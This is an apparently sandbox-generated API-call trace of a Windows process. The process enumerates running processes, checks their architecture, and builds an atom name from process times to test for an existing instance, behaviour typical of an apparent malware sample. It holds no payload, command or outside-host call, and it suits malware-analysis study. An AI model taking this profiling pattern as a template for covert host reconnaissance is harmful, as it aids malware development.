	[0071.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0071.039] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.039] CloseHandle (hObject=0x224) returned 1
	[0071.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7289b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0071.039] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.039] CloseHandle (hObject=0x224) returned 1
	[0071.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0071.039] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.039] CloseHandle (hObject=0x224) returned 1
	[0071.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0071.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0071.039] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.039] CloseHandle (hObject=0x224) returned 1
	[0071.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0071.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.040] CloseHandle (hObject=0x224) returned 1
	[0071.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0071.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.040] CloseHandle (hObject=0x224) returned 1
	[0071.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728998, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0071.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0071.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.040] CloseHandle (hObject=0x224) returned 1
	[0071.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0071.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.040] CloseHandle (hObject=0x224) returned 1
	[0071.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0071.040] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.041] CloseHandle (hObject=0x224) returned 1
	[0071.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0071.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0071.041] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.041] CloseHandle (hObject=0x224) returned 1
	[0071.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0071.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0071.041] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.041] CloseHandle (hObject=0x224) returned 1
	[0071.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0071.041] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.041] CloseHandle (hObject=0x224) returned 1
	[0071.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0071.041] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.041] CloseHandle (hObject=0x224) returned 1
	[0071.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0071.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.042] CloseHandle (hObject=0x224) returned 1
	[0071.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0071.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.042] CloseHandle (hObject=0x224) returned 1
	[0071.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7289f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0071.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.042] CloseHandle (hObject=0x224) returned 1
	[0071.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0071.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.042] CloseHandle (hObject=0x224) returned 1
	[0071.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0071.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.042] CloseHandle (hObject=0x224) returned 1
	[0071.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb30, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0071.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0071.043] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.043] CloseHandle (hObject=0x224) returned 1
	[0071.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0071.043] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.043] CloseHandle (hObject=0x224) returned 1
	[0071.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0071.043] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.043] CloseHandle (hObject=0x224) returned 1
	[0071.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0071.043] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.043] CloseHandle (hObject=0x224) returned 1
	[0071.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0071.043] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.043] CloseHandle (hObject=0x224) returned 1
	[0071.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0071.044] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.044] CloseHandle (hObject=0x224) returned 1
	[0071.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0071.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0071.044] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.044] CloseHandle (hObject=0x224) returned 1
	[0071.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e838, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0071.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.044] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.044] CloseHandle (hObject=0x224) returned 1
	[0071.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.044] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetLastError () returned 0x5
	[0071.045] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.046] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0071.046] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.046] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.047] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetLastError () returned 0x5
	[0071.048] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.048] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0071.048] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.048] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0071.048] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0071.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0071.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0071.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.049] CloseHandle (hObject=0x224) returned 1
	[0071.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0071.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0071.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0071.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.049] CloseHandle (hObject=0x224) returned 1
	[0071.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16b38) returned 0xc0000004
	[0071.416] VirtualAlloc (lpAddress=0x0, dwSize=0x16c38, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0071.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16c38, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0071.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0071.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0071.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0071.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0071.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0071.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
